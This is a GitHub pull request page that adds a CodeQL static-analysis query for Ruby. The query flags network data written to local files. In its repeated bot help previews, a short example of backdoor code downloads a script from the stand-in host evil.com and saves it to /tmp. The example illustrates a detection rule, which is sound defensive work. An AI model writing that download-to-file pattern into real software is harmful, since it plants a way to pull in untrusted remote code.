Ruby: Add rb/http-to-file-access query #8224

hmac · 2022-02-24T03:13:27Z

This is a direct port of the JS version. I've ported the concept RequestInputAccess from JS, which we didn't already have an equivalent for. I've also directly shared HttpToFileAccessQuery and HttpToFileAccessCustomizations between Ruby and JS. Language-specific imports and some classes that extend differently-named concepts have been moved to HttpToFileAccessSpecific.

github-actions · 2022-02-24T03:15:55Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-02-24T04:08:59Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-02-24T22:38:14Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-02-24T23:22:46Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-03-01T02:41:14Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-03-02T03:51:31Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-03-02T04:47:13Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-03-07T23:25:15Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-03-07T23:27:13Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

github-actions · 2022-03-07T23:44:15Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

erik-krogh

JS 👍

alexrford

LGTM aside from small merge conflicts - sorry for taking so long to review this.

alexrford · 2022-03-15T15:28:54Z

ruby/ql/lib/codeql/ruby/Concepts.qll

+      /**
+       * Gets a string that describes the type of this input.
+       *
+       *  This is typically the name of the method that gives rise to this input.


Suggested change

* This is typically the name of the method that gives rise to this input.

* This is typically the name of the method that gives rise to this input.

alexrford · 2022-03-15T15:29:02Z

ruby/ql/lib/codeql/ruby/Concepts.qll

+        /**
+         * Gets a string that describes the type of this input.
+         *
+         *  This is typically the name of the method that gives rise to this input.


Suggested change

* This is typically the name of the method that gives rise to this input.

* This is typically the name of the method that gives rise to this input.

github-actions · 2022-03-20T22:59:47Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

hmac · 2022-03-20T23:14:08Z

Sorry if you got pinged by this - I briefly pulled in some unrelated commits and the bots had a field day.

github-actions · 2022-03-21T03:14:02Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

erik-krogh

JS 👍

alexrford

LGTM

This sits in between RemoteFlowSource and specific classes like ParamsSource from ActionController. It represents any user-controller input from an incoming HTTP request. This more closely aligns our concepts with the JS library, and allows us to specifically target sources from HTTP requests in the HttpToFileAccess query.

Only consider sources from HTTP requests, rather than any remote flow source.

There's so little in this query that it may not be worth sharing, but it's an interesting exercise in figuring out how we do it nicely.

github-actions · 2022-03-21T22:13:58Z

QHelp previews:

ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp

Network data written to file

Storing user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.

Recommendation

Examine the highlighted code closely to ensure that it is behaving as intended.

Example

The following example shows backdoor code that downloads data from the URL https://evil.com/script, and stores it in the local file /tmp/script.

require "net/http"

resp = Net::HTTP.new("evil.com").get("/script").body
file = File.open("/tmp/script", "w")
file.write(body)

Other parts of the program might then assume that since /tmp/script is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.

References

OWASP: Trojan Horse.
OWASP: Unrestricted File Upload.
Common Weakness Enumeration: CWE-912.
Common Weakness Enumeration: CWE-434.

hmac · 2022-03-22T00:48:29Z

@alexrford thanks the patient re-reviews! The dismiss-reviews-on-rebase behaviour is such a pain 😒

github-actions bot added documentation Ruby labels Feb 24, 2022

hmac force-pushed the hmac/http-to-file-access branch from 195e412 to b26878b Compare February 24, 2022 04:08

hmac force-pushed the hmac/http-to-file-access branch from 6d93670 to 2fb801c Compare February 24, 2022 23:21

github-actions bot added the JS label Mar 1, 2022

hmac force-pushed the hmac/http-to-file-access branch from f900500 to 5f1ebd5 Compare March 2, 2022 03:50

hmac force-pushed the hmac/http-to-file-access branch from 5f1ebd5 to 3af2c21 Compare March 2, 2022 04:42

hmac removed the JS label Mar 3, 2022

hmac marked this pull request as ready for review March 3, 2022 03:25

hmac requested a review from a team as a code owner March 3, 2022 03:25

hmac requested a review from a team as a code owner March 7, 2022 23:24

github-actions bot added the JS label Mar 7, 2022

hmac force-pushed the hmac/http-to-file-access branch 2 times, most recently from 8571717 to 41a42fb Compare March 7, 2022 23:26

erik-krogh previously approved these changes Mar 8, 2022

View reviewed changes

alexrford previously approved these changes Mar 15, 2022

View reviewed changes

hmac dismissed stale reviews from alexrford and erik-krogh via e148de6 March 20, 2022 22:49

hmac force-pushed the hmac/http-to-file-access branch from 346abf9 to e148de6 Compare March 20, 2022 22:49

hmac requested a review from a team as a code owner March 20, 2022 22:49

hmac force-pushed the hmac/http-to-file-access branch 2 times, most recently from e521f88 to 77bc75f Compare March 20, 2022 22:58

hmac removed request for a team March 20, 2022 23:12

hmac removed C# C++ Java Python labels Mar 20, 2022

hmac force-pushed the hmac/http-to-file-access branch from 77bc75f to b26ddda Compare March 21, 2022 03:13

erik-krogh previously approved these changes Mar 21, 2022

View reviewed changes

alexrford previously approved these changes Mar 21, 2022

View reviewed changes

hmac added 6 commits March 22, 2022 11:09

Ruby: Add rb/http-to-file-access query

ff1d96c

Ruby: Make HttpToFileAccess more specific

130d93d

Only consider sources from HTTP requests, rather than any remote flow source.

Share HttpToFileAccessQuery between JS and Ruby

91a7e94

There's so little in this query that it may not be worth sharing, but it's an interesting exercise in figuring out how we do it nicely.

Add missing file doc comment

c2d4bc5

Ruby: Fix doc comment formatting

b1ae548

hmac dismissed stale reviews from alexrford and erik-krogh via b1ae548 March 21, 2022 22:10

hmac force-pushed the hmac/http-to-file-access branch from b26ddda to b1ae548 Compare March 21, 2022 22:10

alexrford approved these changes Mar 21, 2022

View reviewed changes

hmac merged commit 3e8bc8b into main Mar 22, 2022

hmac deleted the hmac/http-to-file-access branch March 22, 2022 00:46

	* This is typically the name of the method that gives rise to this input.
	* This is typically the name of the method that gives rise to this input.

Ruby: Add rb/http-to-file-access query #8224

Ruby: Add rb/http-to-file-access query #8224

Uh oh!

Conversation

hmac commented Feb 24, 2022 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

github-actions bot commented Feb 24, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Feb 24, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Feb 24, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Feb 24, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Mar 1, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Mar 2, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Mar 2, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Mar 7, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Mar 7, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

github-actions bot commented Mar 7, 2022

Network data written to file

Recommendation

Example

References

Uh oh!

erik-krogh left a comment

Choose a reason for hiding this comment

Uh oh!

alexrford left a comment

Choose a reason for hiding this comment

Uh oh!

alexrford Mar 15, 2022

Choose a reason for hiding this comment

Uh oh!

alexrford Mar 15, 2022

Choose a reason for hiding this comment

Uh oh!

github-actions bot commented Mar 20, 2022

hmac commented Feb 24, 2022 •

edited

Loading